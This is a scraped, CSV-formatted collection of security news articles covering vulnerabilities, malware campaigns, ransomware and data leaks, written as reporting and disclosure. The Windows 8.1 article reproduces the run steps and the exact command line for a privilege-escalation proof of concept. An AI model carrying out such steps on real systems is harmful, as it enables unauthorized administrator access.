Over last many years, several significant vulnerabilities including BEAST, POODLE, and CRIME, have been discovered in the SSL protocol leveraging the RC4's weakness. Though, a large number of websites on the Internet relying on RC4.
iPhone can be used as spy phone to get desktop Keystrokes,https://thehackernews.com/2011/10/iphone-can-be-used-as-spy-phone-to-get.html,"iPhone can be used as spy phone to get desktop Keystrokes
What if a hacker could log every key you typed on your PC by placing a cellphone nearby? US researchers have shown how this is possible using any smartphone available today.
At a conference in Chicago on Thursday, a group of computer researchers from Georgia Tech will report on another potential threat. The researchers have shown that the accelerometer and orientation sensor of a phone resting on a surface can be used to eavesdrop as a password is entered using a keyboard on the same surface. They were able to capture the words typed on the keyboard with as much as 80 percent accuracy.
Normally when security researchers describe spyware on smartphones, they mean malicious code that can be used to snoop on calls, or to steal the data held on mobile phones.In this case, however, researchers have described how they have put software on smartphones to spy on activity outside the phone itself - specifically to track what a user might be doing on a regular desktop keyboard nearby.
The typing detection works by ""using a smartphone accelerometer – the internal device that detects when and how the phone is tilted – to sense keyboard vibrations as you type to decipher complete sentences with up to 80% accuracy,"" according to the Institute.
""We first tried our experiments with an iPhone 3GS, and the results were difficult to read,"" said Patrick Traynor of Georgia Tech. ""But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the last two years are sophisticated enough to do this attack.""
As phone technology improves, attacks via the accelerometer could become more feasible. The researchers' initial experiments used Apple's iPhone 3GS, but the phone's accelerometer lacked the necessary sensitivity. The researchers then moved to the iPhone 4, which uses a gyroscope to remove noise from the accelerometer data, and had much greater success.
""The way we see this attack working is that you, the phone's owner, would request or be asked to download an innocuous-looking application, which doesn't ask you for the use of any suspicious phone sensors,"" said Henry Carter, one of the study's co-authors . ""Then the keyboarddetection malware is turned on, and the next time you place your phone next to the keyboard , it starts listening.""
Android Flaw Lets Hackers Inject Malware Into Apps Without Altering Signatures,https://thehackernews.com/2017/12/android-malware-signature.html,"Millions of Android devices are at serious risk of a newly disclosed critical vulnerability that allows attackers to secretly overwrite legitimate applications installed on your smartphone with their malicious versions.
Dubbed Janus, the vulnerability allows attackers to modify the code of Android apps without affecting their signature verification certificates, eventually allowing them to distribute malicious update for the legitimate apps, which looks and works same as the original apps.
The vulnerability (CVE-2017-13156) was discovered and reported to Google by security researchers from mobile security firm GuardSquare this summer and has been patched by Google, among four dozen vulnerabilities, as part of its December Android Security Bulletin.
However, the worrisome part is that majority of Android users would not receive these patches for next few month, until their device manufacturers (OEMs) release custom updates for them, apparently leaving a large number of smartphone users vulnerable to hackers.
The vulnerability affects apps using APK signature scheme v1 installed on devices running Android versions 5 (Lollipop) and 6 (Marshmallow).
Explained: How Android Janus Vulnerability Works?
The vulnerability resides in the way Android handles APK installation for some apps, leaving a possibility to add extra bytes of code to an APK file without affecting the application's signature.
Before proceeding further, you need to know some basics about an APK file.
A valid APK file is a type of archive file, just like Zip, which includes application code, resources, assets, signatures, certificates, and manifest file.
Earlier versions of Android operating system 5.0 (Lollipop) and 6.0 (Marshmallow) also support a process virtual machine that helps to execute APK archives containing a compiled version of application code and files, compressed with DEX (Dalvik EXecutable) file format.
While installing an Android app or its update, your device checks APK header information to determine if the archive contains code in the compressed DEX files.
If header says APK archive contains DEX files, the process virtual machine decompiles the code accordingly and executes it; otherwise, it runs the code as a regular APK file.
It turns out that an APK archive can contain DEX files as well as regular application code simultaneously, without affecting its validity and signatures.
Researchers find that this ability to add extra bytes of code due to lack of file integrity checking could allow attackers to prepend malicious code compiled in DEX format into an APK archive containing legitimate code with valid signatures, eventually tricking app installation process to execute both code on the targeted device without being detected.
In other words, the hack doesn't require attackers to modify the code of legitimate applications (that makes signatures invalid)—instead, the vulnerability allows malware authors to merely add some extra malicious lines of code to the original app.
Attack Scenarios
After creating malicious but valid versions of legitimate applications, hackers can distribute them using various attack vectors, including spam emails, third-party app stores delivering fake apps and updates, social engineering, and even man-in-the-middle attacks.
According to the researchers, it may be ""relatively easy to trick some users because the application can still look exactly like the original application and has the proper signature.""
I find man-in-the-middle attack more interesting, as it could allow hackers to push malicious installation for the apps designed to receive its updates over an unencrypted HTTP connection.
""When the user downloads an update of an application, the Android runtime compares its signature with the signature of the original version. If the signatures match, the Android runtime proceeds to install the update,"" GuardSquare explains.
""The updated application inherits the permissions of the original application. Attackers can, therefore, use the Janus vulnerability to mislead the update process and get an unverified code with powerful permissions installed on the devices of unsuspecting users.""
""For experts, the common reverse engineering tools do not show the injected code. Users should always be vigilant when downloading applications and updates,"" the security firm added.
Since this vulnerability does not affect Android 7 (Nougat) and latest, which supports APK signature scheme version 2, users running older Android versions are highly recommended to upgrade their device OS (if available).
It's unfortunate, but if your device manufacturer neither offers security patches nor the latest Android version, then you should not install apps and updates from outside of Google Play Store to minimise the risk of being hacked.
Researchers also advised Android developers always to apply signature scheme v2 in order to ensure their apps cannot be tampered with.
Millions of printers open to devastating hack attack,https://thehackernews.com/2011/11/millions-of-printers-open-to.html,"Millions of printers open to devastating hack attack
Could a hacker from half-way around the planet control your printer and give it instructions so frantic that it could eventually catch fire? Or use a hijacked printer as a copy machine for criminals, making it easy to commit identity theft or even take control of entire networks that would otherwise be secure?
It's not only possible, but likely, say researchers at Columbia University, who claim they've discovered a new class of computer security flaws that could impact millions of businesses, consumers, and even government agencies.
The researchers, who have working quietly for months in an electronics lab under a series of government and industry grants, described the flaw in a private briefing for federal agencies two weeks ago. They told Hewlett-Packard about it last week.
HP said Monday that it is still reviewing details of the vulnerability, and is unable to confirm or deny many of the researchers' claims, but generally disputes the researchers' characterization of the flaw as widespread. Keith Moore, chief technologist for HP's printer division, said the firm ""takes this very seriously,"" but his initial research suggests the likelihood that the vulnerability can be exploited in the real world is low in most cases.
""Until we verify the security issue, it is difficult to comment,"" he said, adding that the firm cannot say yet what printer models are impacted.
But the Columbia researchers say the security vulnerability is so fundamental that it may impact tens of millions of printers and other hardware that use hard-to-update ""firmware"" that's flawed.
[Read More : MSNBC]
Russian Hacker Pleads Guilty to Developing and Distributing Citadel Trojan,https://thehackernews.com/2017/03/citadel-trojan-hacker.html,"A Russian man accused of developing and distributing the Citadel Banking Trojan, which infected nearly 11 Million computers globally and caused over $500 Million in losses, has finally pleaded guilty to charges of computer fraud.
Mark Vartanyan, 29, who was very well known as ""Kolypto,"" pleaded guilty in an Atlanta courtroom on Monday to charges related to computer fraud and is now co-operating with federal prosecutors in return for a reduced sentence of no more than five years in prison.
Vartanyan, a native of Moscow, was arrested in Norway in October 2014 and extradited to the United States in December last year. He was involved in the development, improvement, maintenance and distribution of the nasty Citadel Trojan.
""This successful extradition is yet another example of how cooperation among international law enforcement partners can be used to disrupt and dismantle global cyber syndicates,"" said U.S. Attorney John Horn.
""This defendant's alleged role in developing and improving Citadel for its use by cyber criminals caused a vast amount of financial harm to individuals and institutions around the world. His appearance in federal court today shows that cyber criminals cannot hide in the shadows of the Internet. We will identify them and bring them to justice wherever they operate.""
Initially developed in 2011, Citadel Trojan – a variant of the Zeus banking Trojan – was designed to infect computer systems and steal online banking credentials and other financial information by masquerading itself as legitimate banking sites.
The offensive threat affected over 11 Million computers in at least 90 countries and estimated to have cost $500 million in losses over a three-year period.
Citadel also introduced a business model that enabled online users to solicit their feedback and then incorporate those functionalities and tweaks in the product, making the malware gain widespread popularity. It was one of the first examples of malware-as–a-service (MaaS).
Sold for up to $2,500, Citadel received regular automated updates, just like with the development of legitimate software programs, to enable the malware to avoid detection by antivirus products and other signature-based security controls.
But eventually, Citadel's source code was leaked in 2013, which helped the antivirus firms to identify and block the threat.
Vartanyan was one of many people who was involved in the development and distribution of the Citadel malware.
Another Russian hacker Dimitry Belorossov, 22, aka Rainerfox, was also arrested in September 2015 and sentenced to four years and six months in prison after pleading guilty to charges related to the distribution of Citadel and infecting over 7,000 infected machines.
Vartanyan is scheduled to be sentenced on 21 June 2017.
Despite the two arrests, the US Department of Justice (DoJ) said its investigation into the creator of Citadel malware is still ongoing, indicating that further arrests may be made.
Critical Vulnerabilities in Facebook and Picasa discovered by Microsoft,https://thehackernews.com/2011/07/critical-vulnerabilities-in-facebook.html,"Critical Vulnerabilities in Facebook and Picasa discovered by Microsoft
Microsoft security researchers have identified critical vulnerabilities in Facebook and Google Picase which led to account compromise and arbitrary code execution.
The bug in Picasa that the MVR team found could allow an attacker to gain complete control of a user's machine if he could entice the victim into downloading a malicious JPEG file. It's not the most complex exploitation scenario, and in the current age of people sharing, downloading, emailing and re-posting photos on a variety of platforms, it might not be too difficult for an attacker to accomplish.
""A vulnerability exists in the way that Picasa handles certain specially crafted JPEG images. An attacker could exploit this vulnerability to cause Picasa to exit unexpectedly and execute arbitrary code. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,"" Microsoft said in its advisory.
The vulnerability in Facebook involves a problem with the way that the site implemented its protection against clickjacking attacks. An attacker could use the vulnerability to gain full access to a victim's account.
""A vulnerability exists in the way Facebook.com had previously implemented protection against clickjacking attacks. An attacker could exploit this vulnerability to circumvent Facebook privacy settings and expose potentially sensitive user information. An attacker who successfully exploited this vulnerability could take complete control of a user's Facebook.com account and could perform any action on behalf of the user such as read potentially sensitive data, change data, and delete contacts,"" the MVR advisory said.
UPDATE : Facebook has fixed the problem, Just after release of Advisory.
Powerful Linux Trojan 'Turla' Infected Large Number of Victims,https://thehackernews.com/2014/12/powerful-linux-trojan-turla.html,"Security researchers have discovered a highly nasty Linux trojan that has been used by cybercriminals in state sponsored attack in order to steal personal, confidential information from government institutions, military and pharmaceutical companies around the world.
A previously unknown piece of a larger puzzle called ""Turla,"" one of the most complex Advanced Persistent Threats (APTs) uncovered by researchers at Kaspersky Lab in August, remained hidden on some systems for at least four years. The malware was notable for its use of a rootkit that made it extremely hard to detect.
The German security company G Data believed that Turla campaign is linked to Russia and has in the past exploited a variety of Windows vulnerabilities, at least two of which were zero-days, to infect government institutions, embassies, military, education, research, and pharmaceutical companies in more than 45 countries.
Recently, security researchers from Moscow-based Kaspersky Lab have detected the first Turla sample targeting Linux operating system. This Linux component of malware points towards a much bigger threat than it was previously thought and it may also herald the discovery of more infected systems.
""The newly discovered Turla sample is unusual in the fact that it's the first Turla sample targeting the Linux operating system that we have discovered,"" Kaspersky researcher Kurt Baumgartner said in an advisory. ""We suspect that this component was running for years at a victim site, but do not have concrete data to support that statement just yet.""
The modules of the Linux-based Turla malware is written in C and C++ languages and contains code from previously written libraries. The malware uses hidden network communication and stripped of symbol information, which makes it hard for researchers to reverse engineer or analyze.
As a result, the Linux-based Turla trojan may have capabilities that have not yet been uncovered completely, as Baumgartner said the Linux component is a mystery even after its discovery, adding it can't be detected using the common Netstat command.
In order to hide itself, the backdoor sits inactive until hackers send it unusually crafted packets that contain ""magic numbers"" in their sequence numbers. The malware have ability to sit unnoticed on victims computers for years. The trojan contained attack functionalities including arbitrary remote command execution, incoming packet interception and remote management even though it requires no root system privileges.
Earlier this year, Kaspersky Labs researches suggested Turla as Snake, which was built on the capabilities of Agent.Biz, the worm that came to the surface in 2008 when US Department of Defense sources claimed that its classified networks had been breached by an early version of the same virus, described by officials as the ""worst breach of US military computers in history."" Uroburos rootkit was also one of the components of Snake campaign.
Agent.Biz has since been developed with many advanced features that make it even more flexible and sophisticated than before. It was thought to have inspired other nasty malware creations including Flame and Guass.
"Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC",https://thehackernews.com/2018/05/adobe-security-patch-update.html,"Adobe has just released new versions of its Acrobat DC, Reader and Photoshop CC for Windows and macOS users that patch 48 vulnerabilities in its software.
A total of 47 vulnerabilities affect Adobe Acrobat and Reader applications, and one critical remote code execution flaw has been patched in Adobe Photoshop CC.
Out of 47, Adobe Acrobat and Reader affect with 24 critical vulnerabilities—categorized as Double Free, Heap Overflow, Use-after-free, Out-of-bounds write, Type Confusion, and Untrusted pointer dereference—which if exploited, could allow arbitrary code execution in the context of the targeted user.
Rest of the 23 flaws, including Security Bypass, Out-of-bounds read, Memory Corruption, NTLM SSO hash theft, and HTTP POST newline injection via XFA submission, are marked as important and can lead to information disclosure or security bypass.
The above-listed vulnerabilities impact the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.
The latest Adobe Acrobat and Reader patches have been given a priority rating of ""1,"" which means the flaws are either being exploited in the wild or more likely to be exploited in the wild. So, users are highly recommended to update their software as soon as possible.
The flaws have been addressed in Acrobat DC and Acrobat Reader DC version 2018.011.20040, Acrobat 2017 and Acrobat Reader DC 2017 version 2017.011.30080, as well as Acrobat Reader DC (Classic 2015) and Acrobat DC (Classic 2015) version 2015.006.30418.
Security Patch for Adobe Photoshop CC
Adobe has also released security patches for the Windows and macOS versions of Photoshop CC to address a critical vulnerability, categorized as ""out-of-bounds write"" issue, which can be exploited to execute arbitrary code in the context of the current user.
The vulnerability (CVE-2018-4946) impacts Photoshop CC 2018 version 19.1.3 and earlier 19.x versions, as well as Photoshop CC 2017 version 18.1.3 and earlier 18.x versions.
The company credited researcher Giwan Go of Trend Micro's Zero Day Initiative for reporting the flaw, which has been addressed with the release of Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4.
This update has been given a priority rating of ""3,"" which means the attackers have not targeted the vulnerability.
Adobe recommends end users and administrators to install the latest security updates as soon as possible.
Massive Breach Exposes Keyboard App that Collects Personal Data On Its 31 Million Users,https://thehackernews.com/2017/12/keyboard-data-breach.html,"In the digital age, one of the most popular sayings is—if you're not paying, then you're not the customer, you're the product.
While downloading apps on their smartphones, most users may not realize how much data they collect on you.
Believe me; it's way more than you can imagine.
Nowadays, many app developers are following irresponsible practices that are worth understanding, and we don't have a better example than this newly-reported incident about a virtual keyboard app.
A team of security researchers at the Kromtech Security Center has discovered a massive trove of personal data belonging to more than 31 million users of the popular virtual keyboard app, AI.type, accidentally leaked online for anyone to download without requiring any password.
Founded in 2010, Ai.type is a customizable and personalizable on-screen keyboard for mobile phones and tablets, with more than 40 million users worldwide.
Apparently, a misconfigured MongoDB database, owned by the Tel Aviv-based startup AI.type, exposed their entire 577 GB of the database online that includes a shocking amount of sensitive details on their users, which is not even necessary for the app to work.
""...they appear to collect everything from contacts to keystrokes.""
The leaked database of over 31 million users includes:
Full name, phone number, and email address
Device name, screen resolution and model details
Android version, IMSI number, and IMEI number
Mobile network name, country of residence and even user enabled languages
IP address (if available), along with GPS location (longitude/latitude).
Links and the information associated with the social media profiles, including birth date, emails, photos.
""When researchers installed Ai.Type they were shocked to discover that users must allow 'Full Access' to all of their data stored on the testing iPhone, including all keyboard data past and present,"" the researchers say.
What's more?
Moreover, the leaked database also reveals that the virtual keyboard app is also stealing users' contact books, including the contacts' names and phone numbers—and already scraped more than 373 million records.
""There was a range of other statistics like the most popular users' Google queries for different regions. Data like average messages per day, words per message, the age of users, words_per_day': 0.0, 'word_per_session and a detailed look at their customers,"" the researchers say.
Researchers go on to raise a question that ""why would like a keyboard, and emoji application need to gather the entire data of the user's phone or tablet?""
Even the recent data breaches have taught us that once our personal data gets in the hands of cybercriminals, it makes us vulnerable forever.
Therefore, the best defense to protect yourself is always—awareness.
Google Researcher Reveals Zero-Day Windows 8.1 Vulnerability,https://thehackernews.com/2015/01/google-researcher-reveals-zero-day_2.html,"A Google security researcher, 'James Forshaw' has discovered a privilege escalation vulnerability in Windows 8.1 that could allow a hacker to modify contents or even to take over victims' computers completely, leaving millions of users vulnerable.
The researcher also provided a Proof of Concept (PoC) program for the vulnerability. Forshaw says that he has tested the PoC only on an updated Windows 8.1 and that it is unclear whether earlier versions, specifically Windows 7, are vulnerable.
Forshaw unearthed the bug in September 2014 and thereby notified on the Google Security Research mailing list about the bug on 30th September. Now, after 90 days disclosure deadline the vulnerability and Proof of Concept program was made public on Wednesday.
The vulnerability resides in the function AhcVerifyAdminContext, an internal function and not a public API which actually checks whether the user is an administrator.
""This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator,"" Forshaw wrote in the mailing list. ""It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID.""
""It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways.""
The PoC contains two program files and some set of instructions for executing the files which, if successful, finally result in the Windows calculator running as an Administrator. According to the researcher, the vulnerability is not in Windows User Account Control (UAC) itself, but UAC is used in part to demonstrate the bug.
Forshaw tested the PoC on Windows 8.1 update, both 32 bit and 64 bit versions, and he recommended users to run the PoC on 32 bit. To verify perform the following steps:
Put the AppCompatCache.exe and Testdll.dll on disk
Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables).
Execute AppCompatCache from the command prompt with the command line ""AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll"".
If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run.
A Microsoft spokesperson confirms the vulnerability and says that it's already working on a fix:
""We are working to release a security update to address an Elevation of Privilege issue. It is important to note that for a would-be attacker to potentially exploit a system, they would first need to have valid logon credentials and be able to log on locally to a targeted machine. We encourage customers to keep their anti-virus software up to date, install all available Security Updates and enable the firewall on their computer.""
At the time of posting this article, there's no patch available and all Windows 8.1 systems are vulnerable to hackers.
Experts Warn About Ongoing AutoHotkey-Based Malware Attacks,https://thehackernews.com/2021/05/experts-warn-about-ongoing-autohotkey.html,"Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on AutoHotkey (AHK) scripting language to deliver multiple remote access trojans (RAT) such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems.
At least four different versions of the campaign have been spotted starting February 2021, according to researchers from Morphisec Labs.
""The RAT delivery campaign starts from an AutoHotKey (AHK) compiled script,"" the researchers noted. ""This is a standalone executable that contains the following: the AHK interpreter, the AHK script, and any files it has incorporated via the FileInstall command. In this campaign, the attackers incorporate malicious scripts/executables alongside a legitimate application to disguise their intentions.""
AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enabling users to automate repetitive tasks in any Windows application.
Regardless of the attack chain, the infection begins with an AHK executable that proceeds to drop and execute different VBScripts that eventually load the RAT on the compromised machine. In one variant of the attack first detected on March 31, the adversary behind the campaign encapsulated the dropped RAT with an AHK executable, in addition to disabling Microsoft Defender by deploying a Batch script and a shortcut (.LNK) file pointing to that script.
A second version of the malware was found to block connections to popular antivirus solutions by tampering with the victim's hosts file. ""This manipulation denies the DNS resolution for those domains by resolving the localhost IP address instead of the real one,"" the researchers explained.
In a similar vein, another loader chain observed on April 26 involved delivering the LimeRAT via an obfuscated VBScript, which is then decoded into a PowerShell command that retrieves a C# payload containing the final-stage executable from a Pastebin-like sharing platform service called ""stikked.ch.""
Lastly, a fourth attack chain discovered on April 21 used an AHK script to execute a legitimate application, before dropping a VBScript that runs an in-memory PowerShell script to fetch the HCrypt malware loader and install AsyncRAT.
Morphisec researchers attributed all the different attack chains to the same threat actor, citing similarities in the AHK script and overlaps in the techniques used to disable Microsoft Defender.
""As threat actors study baseline security controls like emulators, antivirus, and UAC, they develop techniques to bypass and evade them,"" the researchers said. ""The technique changes detailed in this report did not affect the impact of these campaigns. The tactical goals remained the same. Rather, the technique changes were to bypass passive security controls. A common denominator among these evasive techniques is the abuse of process memory because it's typically a static and predictable target for the adversary.""
This is not the first time adversaries have abused AutoHotkey to drop malware. In December 2020, Trend Micro researchers uncovered a credential stealer written in AutoHotkey scripting language that singled out financial institutions in the U.S. and Canada.
Hacking WordPress Website with Just a Single Comment,https://thehackernews.com/2015/04/WordPress-vulnerability.html,"Most of the time, we have reported about WordPress vulnerabilities involving vulnerable plugins, but this time a Finnish security researcher has discovered a critical zero-day vulnerability in the core engine of the WordPress content management system.
Yes, you heard it right. The WordPress CMS used by Millions of website is vulnerable to a zero-day flaw that could allow hackers to remote code execution on the Web server in order to take full control of it.
The vulnerability, found by Jouko Pynnönen of Finland-based security firm Klikki Oy, is a Cross-Site Scripting (XSS) flaw buried deep into the WordPress' comments system.
The vulnerability affects the WordPress versions 3.9.3, 4.1.1, 4.1.2, and the latest WordPress version 4.2.
Pynnönen disclosed the details of the zero-day flaw, along with a video and a proof-of-concept code for an exploit of the bug, on his blog post on Sunday before the WordPress team could manage to release a patch.
Why the researcher made the 0-Day Public?
A similar cross-site-scripting (XSS) vulnerability was patched this week by WordPress developers, which was nearly 14 months after the bug was reported to the team.
Due to fear of delay in fixing this hole, Pynnönen went public with the details of critical zero-day vulnerability in WordPress 4.2 and below, so that the users of the popular content management system could be warned beforehand.
Moreover, Pynnonen reported the vulnerability to the WordPress team but they ""refused all communication attempts"" he made since November 2014.
The exploitation of the 0-Day vulnerability:
The vulnerability allows a hacker to inject malicious JavaScript code into the comments section that appears at the bottom of Millions of WordPress blogs or article posts worldwide. However, this action should be blocked under ordinary circumstances.
This could allow hackers to change passwords, add new administrators, or take other actions that could only be performed by the legitimate administrator of the website. This is what we call a cross-site scripting attack.
Video Demonstration of the attack:
You can watch the video demonstration below which shows an attack in action:
Pynnonen described the 0-day flaw as below:
""If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors,"" Pynnönen wrote in a blog post published Sunday evening.
""Alternatively the attacker could change the administrator's password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.""
How the 0-Day exploit works?
The zero-day exploit provided by the researcher works by posting a simple JavaScript code as a comment and then adding as long as 66,000 characters or over 64 KB in size.
When the comment is processed by someone with WordPress admin rights to the website, the malicious code will be executed without giving any indication to the admin.
By default, WordPress does not automatically publish a user's comment to a post until and unless the user has been approved by the administrator of the site.
Hackers can bypass this limitation by fooling the administrator with their benign first comment, which once approved would enable any further malicious comments from that person to be automatically approved and published to the same post.
WordPress patches the 0-Day flaw:
In order to fix the security hole, administrators should upgrade their CMS to Wordpress 4.2.1, which was released few hours ago.
""This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately,"" the WordPress team said of the latest version.
WordPress version 4.2.1 reportedly fixes the zero-day vulnerability reported by Pynnonen. So if you own a WordPress website, make sure that you run an updated version of the CMS with all the plugins up-to-date.
"100,000 Refrigerators and other home appliances hacked to perform cyber attack",https://thehackernews.com/2014/01/100000-refrigerators-and-other-home.html,"Have you given shed to Zombies in your house? No???? May be you have no idea about it. After Computers, Servers, Routers, Mobiles, Tablets…. Now its turn of your home appliances to be a weapon or a victim of cyber war.
Recently Security Researchers from Proofpoint found more than 100,000 Smart TVs, Refrigerator, and other smart household appliances compromised by hackers to send out 750,000 malicious spam emails.
As the 'Internet of Things' becoming smart and popular it became an easy weapon for cyber criminals to launch large scale of cyber attacks.
""The attack that Proofpoint observed and profiled occurred between December 23, 2013 and January 6, 2014, and featured waves of malicious email, typically sent in bursts of 100,000, three times per day, targeting Enterprises and individuals worldwide.""
Previously, such attacks were only drafted theoretically by researchers, but this is the first such proven attack involved smart household appliances that are used as 'thingBots'- Thing Robots.
Like your personal computers can be unknowingly compromised to built a huge botnet network that can be used to launch cyber attacks, in the similar way your Smart Household Appliances and other components of the ""Internet of Things"" can be transformed into slaves by the cyber criminals.
The worst thing with these smart appliances is that it can be easily approached by cyber criminals due to its 24 hour availability on the Internet with an add-on of poorly protected Internet environment i.e. Poor misconfiguration and the use of default passwords.
More than 25 percent of the volume was sent by things that were not conventional laptops, desktop computers or mobile devices; instead, the emails were sent by everyday consumer gadgets such as compromised home-networking routers, connected multi-media centers, televisions and at least one refrigerator. No more than 10 emails were initiated from any single IP address, making the attack difficult to block based on location -- and in many cases, the devices had not been subject to a sophisticated compromise; instead, misconfiguration and the use of default passwords left the devices completely exposed on public networks, available for takeover and use.""
Now it seems that we have 100's of cyber weapon in our home or in another way 100's of vulnerable dynamites living with us.
This time it has been just a spam mail attack, but answer me.. How much damage could a group of well-trained hackers do, economic and otherwise, if they really wanted to? Reply us your views in the comment box (below). Stay with us, Stay Safe!
BlackBerry Enterprise Servers vulnerable to TIFF Image based Exploit,https://thehackernews.com/2013/02/blackberry-enterprise-servers.html,"If you are a BlackBerry Enterprise Network user, here is something you need to be careful about. BlackBerry Enterprise Server (BES) users have been warned that an image-based exploit could allow hackers to access and execute code on the servers used to support corporate users of BlackBerry smartphones.
The flaw that been rated as high severity and actual vulnerability in BlackBerry Enterprise Servers resulted from how the server processes image files.
Scenario to Exploit Vulnerability : A malicious person writes a special code and then embeds it in a TIFF image file. The person then convinces a Blackberry smart phone user (whose phone is connected to a corporate BES) to view the TIFF file.
As soon as the image file loads on the phone, the code runs on the Blackberry Enterprise server and either opens up a back door in the network or causes the network to crash altogether as instructed in the basic code.
""RIM is not aware of any attacks on or specifically targeting BlackBerry Enterprise Server customers, and recommends that affected customers update to the latest available software version to be fully protected from these vulnerabilities."" Blackberry said.
The exploit uses a TIFF image containing malicious code, and the dangerous image can either be linked to an email or attached directly to it. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network.
BlackBerry Enterprise Server Express version 5.0.4 and earlier for Microsoft Exchange and IBM Lotus Domino and BlackBerry Enterprise Server version 5.0.4 and earlier for Microsoft Exchange, IBM Lotus Domino and Novell Groupwise are affected only.
Izz ad-Din al-Qassam Cyber Fighters threaten American Banks again,https://thehackernews.com/2012/12/izz-ad-din-al-qassam-cyber-fighters.html,"The Izz ad-Din al-Qassam Cyber Fighters published a new message on their Pastebin profile , warning of a new round of cyber attacks against U.S. financial institutions, beginning this week.
In September and October, al-Qassam launched widespread distributed denial-of-service (DDoS) attacks against numerous banking websites.
A Bank of America spokesperson told that the bank is ""aware of the reports of possible cyber attacks and [is] monitoring [its] systems, which are fully operational."".
Hacker said in new warning note ,""After stopping one month attack of Izz ad-Din al-Qassam Group to American banks, today, this group has announced a new cycle of attacks, via an Email which has been sent to us, and has acclaimed that its aim is to compensate guilty offends to holy Prophet of Islam, Mohammad(PBUH). Also, in internet conversations earlier, this group had been stated that these attacks won't stopped and even in new announcements, it's been marked that there will be so much stronger attacks in the days ahead.""
This phase two of DDOS attack serious named as ""Operation Ababil"" . Note describe, ""the second phase of the Ababil operation is in ahead and from this week according to the announced plan, will be performed. In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks.""
""They didn't pay any attention to the extensive complaints made by Muslims against this offend and also did not take in to account their damaged feelings and behave with them so rudely. We know that they only marked the sensitivity and honor of the Muslims and examine it and now they really observe the consequences of this experiment so strongly.""
While the perpetrators behind the al-Qassam attacks have yet to be identified, the name is a reference to the armed wing of Hamas, although the entire group employs militaristic means and terrorist attacks. U.S. officials have said they believe the attacks are state-sponsored by Iran, but the cyber attackers still insist they are not working for any government.
"CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers",https://thehackernews.com/2016/02/ctb-locker-ransomware.html,"In last few years, we saw an innumerable rise in ransomware threats ranging from Cryptowall to Locky ransomware discovered last week.
Now, another genre of ransomware had been branched out from the family of CTB-Locker Ransomware with an update to infect Websites.
The newly transformed ransomware dubbed ""CTB-Locker for Websites"" exclusively hijacks the websites by locking out its data, which would only be decrypted after making a payment of 0.4 BTC.
This seems to be the very first time when any ransomware has actually defaced a website in an attempt to convince its administrator to comply with the ransom demand.
However, the infected website admins can unlock any 2 files by the random generator for free as a proof of decryption key works.
Here's How CTB-Locker for Websites Ransomware Works
Lawrence explained that CTB-Locker ransomware replaces the index page (the original index.php or index.html) of the servers hosting websites with the attacker's defacement page (a new affected index.php).
The defacement page serves a message informing the site owners that their files have been encrypted, and they need to pay a ransom before a certain deadline.
Once encrypted, the compromised websites display the following message:
""Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site.""
The message also contains a step-by-step guide that helps the CTB-Locker victims to make the payment to a specific Bitcoin address.
FREE Key to Decrypt Any 2 Random Files
Soon after gaining the website control, the ransomware attacker submits two different AES-256 decryption keys to the affected index.php.
The first key would be used to decrypt any 2 random files from the locked files for free under the name of ""test"" which are chosen to demonstrate the decryption procedure.
Once the site administrator enters the filename and hit ""Decrypt for Free,"" jquery would be fired up upon the request to test the decryption key in a C&C Server. When the key is received, it'll decrypt any 2 random files and display 'Congratulations! TEST FILES WAS DECRYPTED!!'
The other decryption key would be the one to decrypt rest of the seized files, after making the payment in Bitcoin to the attacker.
All the website's content would be encrypted using an AES-256 algorithm, and a unique ID would be generated for each infected website.
Nearly all possible types of files extensions are being affected by CTB-Locker Ransomware.
Live Session with Ransomware Attackers
Another unique characteristic of the ransomware is giving victims the ability to exchange messages with the ransomware attackers, noted by Lawrence in his blogpost.
The ransomware developers have organized a chat room in such a way that the victims could talk with the ransomware creators after the specifying name of the secret file which is present in the same directory with index.php.
CTB Locker for Website → Modifies Packages in the Server
The CTB-Locker for Website package utilizes a variety of files described below:
index.php : The Main component of CTB-Locker for Websites and contains the encryption and decryption routines as well as the payment page.
allenc.txt : Contains a list of all encrypted files.
test.txt : Contains the path and filenames to two prechosen files that can be decrypted for free.
victims.txt : It contains a list of all files that are to be encrypted. However, the files that are already encrypted will remain in this list.
extensions.txt - The list of file extensions that should be encrypted.
secret_[site_specific_string] : The secret file used by the Free Decrypt and Chat functions and is located in the same folder as the index.php file.
Command and Control Server Location:
According to Benkow Wokned (@benkow_), a security researcher who discovered CTB-Locker for Website, found that the index.php page utilizes the jQuery.post() function to communicate and POST data to the Ransomware's Command and Control (C&C) servers.
